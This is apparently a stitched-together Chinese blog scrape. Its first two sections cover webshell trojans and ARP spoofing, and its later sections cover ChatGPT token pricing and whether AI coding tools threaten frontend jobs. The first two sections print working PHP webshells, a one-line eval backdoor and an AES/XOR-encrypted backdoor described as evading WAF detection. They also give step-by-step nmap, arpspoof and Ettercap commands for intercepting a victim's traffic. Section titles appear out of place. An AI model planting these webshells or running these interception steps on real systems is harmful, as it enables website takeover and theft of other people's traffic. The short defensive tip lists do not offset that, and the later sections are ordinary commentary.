前端发布的那些事

**当谈到计算机安全时，"木马"经常被提及。这种恶意软件可以通过一行代码来危害你的计算机系统，其影响可能非常严重。虽然它可能只是一行代码，但是却可以打开恶意攻击者的门户，使他们能够在你的计算机上执行各种不良操作。本篇主要是通过对木马注入的讲解，提升网站建站者关于安全方面的知识。**

**以下是一些常见的注入方式：**

1. SQL注入：攻击者可以通过构造恶意的SQL查询来利用Web应用程序的安全漏洞，从而向数据库中注入恶意代码。
2. XSS（跨站脚本）注入：攻击者可以通过向受害者的浏览器中注入恶意的JavaScript代码来利用Web应用程序的安全漏洞。
3. 文件上传漏洞：攻击者可以通过上传包含恶意代码的文件来利用Web应用程序的安全漏洞，从而向服务器中注入恶意代码。
4. 命令注入：攻击者可以通过向Web应用程序提交恶意的命令来利用安全漏洞，从而向服务器中注入恶意代码。




# 一句话木马


📚 一句木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。
黑客多在注册信息的电子邮箱或者个人主页等中运行该木马。

若当前的网站建站者，未对上传文件进行过滤，我们上传一段PHH文件

```php
<?php @eval($_POST['shell']); ?>
```

这是php的一句话后门中最普遍的一种。它的工作原理是：
首先存在一个名为shell的变量，shell的取值为HTTP的POST方式。
Web服务器对shell取值以后，然后通过eval()函数执行shell里面的内容。

💡 注入PHP脚本后，可以使用[**蚁剑**](https://github.com/AntSwordProject/antSword)软件达到控制对应网站的行为。


# 二进制加密木马

📚 一句话木马从最早的<%execute(request(“cmd”))%>到现在，也有快二十年的历史了。客户端工具也从最简单的一个html页面发展到现在的各种GUI工具。但是近些年友军也没闲着，涌现出了各种防护系统，这些防护系统主要分为两类：一类是基于主机的，如Host based IDS、安全狗、D盾等，基于主机的防护系统主要是通过对服务器上的文件进行特征码检测；另一类是基于网络流量的，如各种云WAF、各种商业级硬件WAF、网络防火墙、Net Based IDS等，基于网络的防护设备其检测原理是对传输的流量数据进行特征检测，目前绝大多数商业级的防护设备皆属于此种类型。**一旦目标网络部署了基于网络的防护设备，我们常用的一句话木马客户端在向服务器发送Payload时就会被拦截，这也就导致了有些场景下会出现一句话虽然已经成功上传，但是却无法连接的情况**。这个时候攻击者往往会选择注入二进制加密木马进行攻击。

[**二进制加密木马详情介绍**](https://xz.aliyun.com/t/2744)


```php
<?php
@error_reporting(0);
session_start();

if ($_SERVER['REQUEST_METHOD'] === 'POST')
{
    $key="453df1fd1cf2943a"; //这一行为密码的md5的前16位
	$_SESSION['k']=$key;
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");

		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15];
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
}
?>
```

💡 使用软件：冰蝎
[**安装说明**](https://blog.csdn.net/weixin_43376075/article/details/109616289)
[**使用提示**](https://blog.csdn.net/qq_41874930/article/details/107916317)


# 为了抵御这些类型的攻击，您可以采取以下措施
1. 及时更新Web应用程序的安全补丁，以减少攻击者利用漏洞的机会。
2. 实施有效的身份验证和授权机制，确保只有授权用户可以访问应用程序。
3. 禁止PHP等脚本语言的文件上传，以防止恶意代码被注入到应用程序中。
4. 使用防火墙和安全软件等安全工具，以检测和防御恶意攻击。
5. 定期进行安全审计和漏洞扫描，以及加强员工的安全意识培训，以提高Web应用程序的安全性。

木马浅学

**当我们谈论计算机网络安全时，ARP攻击是一个经常被提及的话题。ARP（Address Resolution Protocol）是一个用于将IP地址映射到MAC地址的协议，它在局域网中广泛使用。但是，ARP协议存在一些安全漏洞，攻击者可以利用这些漏洞发起ARP攻击，从而获得对网络流量的控制权。在本文中，我们将深入探讨ARP攻击的原理、类型和如何保护网络免受其攻击。**



# 什么是ARP攻击
正常上网情况：普通用户上网前会先向路由器（网关）发送一个arp请求以询问路由器的mac地址，而路由器（网关）会返回一个arp响应告诉用户自己的mac地址，普通用户再向路由器（网关）发送数据包，网关转发到公网实现上网的目的。

看似此流程很安全，数据也没有泄露，但是存在一个缺陷，计算机会根据收到的arp响应的顺序来确定将要转发数据包的对象，此时假象，如果黑客不断向普通用户发送arp响应告诉普通用户网关的mac地址是自己，普通用户便会讲数据发送给黑客。

![Untitled.png](https://blog.ccz.life/static/img/2f84e1abdbd8f405f99934064ee13bb4.Untitled.png)

# 如何进行ARP攻击
以下测试均在Macos系统下进行:

**获取当前网关地址**
```jsx
arp -a  // ARP缓存列表
route get default // 当前网关地址

假设得到网关地址10.250.0.1，下面也会使用该地址为网关地址
```

**获取攻击机器IP**

```jsx
brew install nmap // 安装nmap工具
nmap -sP 10.250.0.1/24  // 扫描网关下的所有IP地址

假设攻击的IP为10.250.0.42
```

**开启IP转发**

```jsx
sudo sysctl -w net.inet.ip.forwarding=1 // mac
echo1 >/proc/sys/net/ipv4/ip_forward // linux 

sudo sysctl -a | grep forward // 查看本机IP转发情况

forwarding=1为开启转发，forwarding=0为关闭转发，关闭转发后，被攻击者会出现断网。
```

**ARP欺骗**

[**arpspoof安装**](https://github.com/YeautyYE/arpspoof)

```jsx
sudo arpspoof -i en0 -t 10.250.0.42 10.250.0.1
```

**抓包**

**[Wireshark安装](https://macwk.com/soft/wireshark)**

```jsx
sudo chmod 777 /dev/bpf* 

Wireshark filter 输入 ip.src == 10.250.0.42&&http
```

**以上方法仅能抓包http的包，若需要抓取https**

需要安装Ettercap

```jsx
brew install ettercap 
brew install adwaita-icon-theme //内置gtk3
sudo ettercap -G

// sudo ettercap -G 若无法运行，则添加下面依赖
brew install libtiff
brew install gtk+3
```
[**Ettercap使用介绍**](https://blog.csdn.net/smli_ng/article/details/106133685)

# 预防ARP攻击
1. 使用静态ARP表：静态ARP表允许管理员手动将MAC地址与IP地址进行映射，以确保只有授权设备可以访问网络。这可以有效防止ARP缓存中被篡改的MAC地址。
2. 实施网络访问控制：实施网络访问控制可以防止未经授权的设备连接到网络。可以使用诸如802.1x认证等技术来确保只有授权设备可以连接到网络。
3. 使用网络监控工具：网络监控工具可以检测并报告网络中的ARP攻击。例如，可以使用网络流量分析工具来检测ARP欺骗攻击并采取相应的措施。
4. 定期更新网络设备的固件：网络设备厂商通常会发布针对已知漏洞的补丁程序。更新网络设备的固件可以修补可能存在的安全漏洞，从而提高网络的安全性。
5. 启用端口安全：启用端口安全可以防止未经授权的设备在网络端口上进行连接。可以使用诸如端口安全协议（Port Security Protocol）等技术来防止ARP欺骗攻击。
6. 加强员工的安全意识培训：ARP攻击通常需要攻击者在网络上运行恶意软件或者欺骗受害者进行某些操作，加强员工的安全意识培训可以提高他们对这些攻击的识别能力，并减少这些攻击的成功率。

ARP 攻击

在 ChatGPT 中，token 是连接自然语言与计算的纽带，通过将文本切分成最小单位，然后将其转化为计算机可处理的形式，使得模型能够理解和生成人类语言。



# 什么是 token

在自然语言处理中，token 指的是文本序列中的最小单位。这些 token 可以是一个字、一个单词、一个标点符号或者其他更小的文本单元。在 ChatGPT 模型中，输入和输出的文本都会被切分成一系列的 token 进行处理。因此，token 在 ChatGPT 中扮演着连接自然语言和计算机处理之间的桥梁，使得模型能够理解和生成人类语言。它们在文本表示、模型输入输出方面起着关键作用。

```
// 中文版
我：你好（使用4个token）

chatGPT：你好！有什么我可以帮助你的吗？（使用31个token)

共计：35个token

// 英文版
我：hello（使用1个token）

chatGPT：Hello! How can I assist you today? （使用9个toke）

共计：10个token
```
相同的一个对话回答，使用英文消耗的 token 会远比中文来的更少，而且在问题越复杂的情况下，表现的越为明显。

# token 价格
ChatGPT 的输入和输出的 token 都是需要计费的，我们来看下计费规则：

![image.png](/static/img/432c800615618ab1c4318341312a6786.image.webp)

### GPT-4 价格
- 8k tokens内，输入是0.03\$/1k tokens，输出是0.06\$/1k tokens
- 32k tokens内，输入是0.06\$/1k tokens，输出是0.12\$/1k tokens

### GPT-3.5 Turbo 价格
- 4k tokens内，输入是0.0015\$/1k tokens，输出是0.002\$/1k tokens
- 16k tokens内，输入是0.003\$/1k tokens，输出是0.004\$/1k tokens

假设上下文都是 4k tokens，GPT4 的价格相比于 GPT-3.5 Turbo
- 输入价格多出20倍
- 输出价格多出30倍

显然，GPT-4 更加的昂贵，但是相比于 GPT-3.5 Turbo，它有着更为强大的功能：
1. 更强的创造力
> GPT-4 比以往任何时候都更具创造性和协作性。它可以生成、编辑并与用户一起迭代创意和技术写作任务，例如创作歌曲、编写剧本或学习用户的写作风格。
> 
2. 图像识别
> GPT-4 可以接受图像作为输入并生成说明、分类和分析。
3. 更长的上下文
> GPT-4 能够处理 32,000 个单词的文本，允许使用长格式内容创建、扩展对话以及文档搜索和分析等用例。
4. 更强的高级推理能力、更强的深度学习方法
5. 更安全、更稳定

# token 计算方式

**通常情况下：**

- 一个简体中文占用 2 个 token
- 一个繁体中文占用 3 个 token
- 一个英文单词占用 4/3 个 Token （1个 token ~= 4个字符的文本）

[GPT分词器 playground](https://platform.openai.com/tokenizer)

1000个 token 约等于 750 个英文单词或者 400～500 个汉字。

100万个 token 约等于 75 万个英文单词或者 40~50 万个汉字，而 100 万个 token 在 GPT-3.5 Turbo 下仅仅需要2$。

我尝试通过中文询问 ChatGPT 关于前端开发的相关问题，每次的 token 花费大约在 600~1000 个token。取中间值，假设每次消耗 800 个token，则 100万 token 可以回答 1250 次技术问题，每次提问仅需要开销0.0016$，按照现在美元兑换人民币 1:7.3 的比例，则每次提问需要开销 0.01168¥，即为一分钱。

**如果需要提供聊天式的问答，整个上下文也会被计算在token内：**

假设每次问答均花费 800 token
- 第一次问答，花费 800 个 token
- 第二次问答，需要关联上下文，即 800 token + 当前回答 800 token = 1600 token
- 第三次问答，即 1600 token + 当前回答 800 token = 2400 token

在聊天式的问答中，token 的消耗将会大幅度增加，即当前的上下文内容越多，下次提问消耗的 token 则越多。当然，上下文的长度也不能无限增长，目前 GPT-3.5 Turbo 最大仅支持 16,000 token 长度，GPT4 最大仅支持 32,000 token 长度。


# ChatGPT 和 搜索引擎 有什么不同

使用搜索引擎时，提炼关键字显得尤为重要，因为它们会根据你提供的关键字从数据库里面拉出一堆列表让你选择。而 ChatGPT 则是通过你的上下文描述，给出对应的回答，所以你的回答描述的尽量详细，它的回答就会更加准确。所以当我们使用 ChatGPT 解决问题时，应该给出尽量详细的Prompt，当问题较为复杂时，可以通过预设角色 + 多次问答的方式进行提问。

还有 ChatGPT 并不会给出固定答案，即使在同一时间段内，发出同样的提问，ChatGPT 的回答可能都不太一样，需要使用者具备灵活处理的能力以及甄别错误的能力。

ChatGPT 中的 token 是什么

今年爆火的 AI 席卷了各行各业，它是带着魔法来的，只需要我们提供 `prompt` ，它就能生成
- 一段回答
- 一篇文章
- 一个网站
- 一页PPT
- 一张图片

它几乎能胜任所有文字和图片相关的工作，所以它还有一个很酷的名字，`AIGC`**（AI generated content）**，直译过来为**人工智能生成内容**，又称为**生成式AI**。



## AI Code
`AI Code` 属于 AIGC 的一部分，直译过来为**人工智能代码**，它是指用于实现和运行人工智能算法、模型和应用程序的计算机代码。

我最早接触的 `AI Code` 工具是 [Github Copilot](https://github.com/features/copilot) 

![image.png](https://blog.ccz.life/static/img/63bc87dea5eb83199bf4d89c2b5cd222.image.webp)

Github Copilot 是一个基于人工智能技术的代码助手。Copilot 使用了机器学习和自然语言处理算法，通过分析代码上下文和注释，为开发人员提供代码补全和代码提示的功能。

Copilot 可以在编辑器中直接使用，我只是通过注释描述了`flat` 函数的作用，它就能自动推导出和描述相关的代码（灰色部分为 Copilot 推导的代码）。

![image.png](https://blog.ccz.life/static/img/20cf6f1a6d3f3cf17286a9712d4a9b62.image.webp)

当然，它能做的不仅于此，实际工作中它能结合上下文推导出**你更需要的代码**。

可惜的是，目前 Copilot 仅对经过验证的学生、教师和热门开源项目的维护人员免费使用。如果你不属于以上人员，需要支付 10\$/月 或者 100\$/年 才能使用。


当然也有比较好的平替产品，目前是完全免费，由亚马逊云推出的 ****[Amazon CodeWhisperer](https://aws.amazon.com/cn/codewhisperer/)****。

支持Javascript、TypeScript、Java、Python、C# 代码提示补全，同时也支持在编辑器内直接使用，感兴趣的小伙伴可以自行进入官网查询使用教程，这里就不做过多的描述了。

## 更强大的GPT-4，草图 ⇒ 页面
在今年3月份 GPT-4 的发布会上，只需要在草稿本上用纸笔画出一个非常粗糙的草图，再拍照告诉GPT-4 需要一个这样的网站，AI 就可以在10秒钟左右根据草图，生成一个网站完整的前端 HTML 代码。

****[点此观看：GPT-4发布：一张草图，一秒生成网站](https://www.bilibili.com/video/BV1tk4y1b7kK/?spm_id_from=333.337.search-card.all.click&vd_source=73c9e1d6fa232ddc12afa550c8da8ebc)****


![image.png](https://blog.ccz.life/static/img/0d9283fccb501451ef01ee6e93219dcb.image.webp)

## 前端会被 AI Code 取代吗？

![11241686733376_.pic.jpg](https://blog.ccz.life/static/img/b69adea743de88b9ff8ce5789bc09264.11241686733376_.pic.webp)

回归我第一次使用 GPT 的时候，我确实是被惊讶到，特别是他能衔接上下文关系，给出你想要的答案。

我们开发应用，其实本身就是一个庞大的上下文，版本一直迭代，需求一直新增，通过人本身去记住业务上下文，在一个足够复杂的应用下，他的上下文会足够大，足够的冗余，我们去抽离组件，抽离函数，使用数据结构优化代码，实际上就是在优化上下文，写代码并不难，难的是如何梳理页面的组件和那些难以理解的业务以及那些人与人的沟通。

至少现在看来，GPT 无法做到承接复杂应用的上下文，现在的他只能帮助你快速产出一个 demo 应用，前提你需要做到甄别代码的能力，以及还需要面临后续版本迭代更新的窘境问题。

或者说，如果 AI 真的能做到独立开发复杂应用，程序员就真的会被取代吗，做程序本身就是一个相对复杂的活，需要持续学习，持续精进。如果AI真的能做到独立开发这一步，那我觉得离真正的无人驾驶也不远了，出租车司机全部都得失业，因为做一个程序相比于驾驶车辆，会难上不少，当然还包括其它行业，80% 以上的职业都极有可能面临下岗危机。

这个是政客、政府不允许的，虽然科技进步是好事，但是 AI 并没有带来实际的增量工作岗位，反而导致失业率变高，失业率若变高，整体社会的稳定性结构就会变差。

## 前端岗位会因为 AI Code 变少吗？
岗位的多少，更多的取决于目前的市场情况。

根据脉脉发布的《2023抢滩数字时代人才发展报告》的统计，在2022年互联⽹岗位量减少50.4%。

![image.png](https://blog.ccz.life/static/img/656646fd2602090f00d4b565ed0becbf.image.webp)

目前来看，互联网赛道收缩和企业降本增效才是前端岗位减少的最大的问题，裁员式的降本成为各个公司美化财报的“秘密武器”。

在降低人员成本的情况下，如何又能让企业正常的运转，通过 AI Code、低代码等工具，确实可以一定程度提升开发效率。如果你目前干的活、做的事，都可以通过这些工具去实现，那么你的可替代性就会变高，面临失业的风险也会相应增加。

## 尾声

![image.png](https://blog.ccz.life/static/img/98be1096930556b3c418face3dcf95ce.image.webp)

我们需要坚守信念并保持积极的心态，杜绝成为工具人。

请记住，技术行业是一个充满机遇和挑战的领域，每一次低谷都是一个新的起点，我们可以从中学习、成长和适应变化。

同时 AI 作为新时代的产物，我们需要更好的使用它，将 AI 看成辅助编码的工具。关注点在于，如何用 AI 去做成更多的事情。

## 参考
[Github Copilot](https://github.com/features/copilot)

[Amazon CodeWhisperer](https://aws.amazon.com/cn/codewhisperer/)

[GPT-4发布：一张草图，一秒生成网站](https://www.bilibili.com/video/BV1tk4y1b7kK/?spm_id_from=333.337.search-card.all.click&vd_source=73c9e1d6fa232ddc12afa550c8da8ebc)

[当互联网大厂裁员遇上春节相亲](https://36kr.com/p/2084589158644231)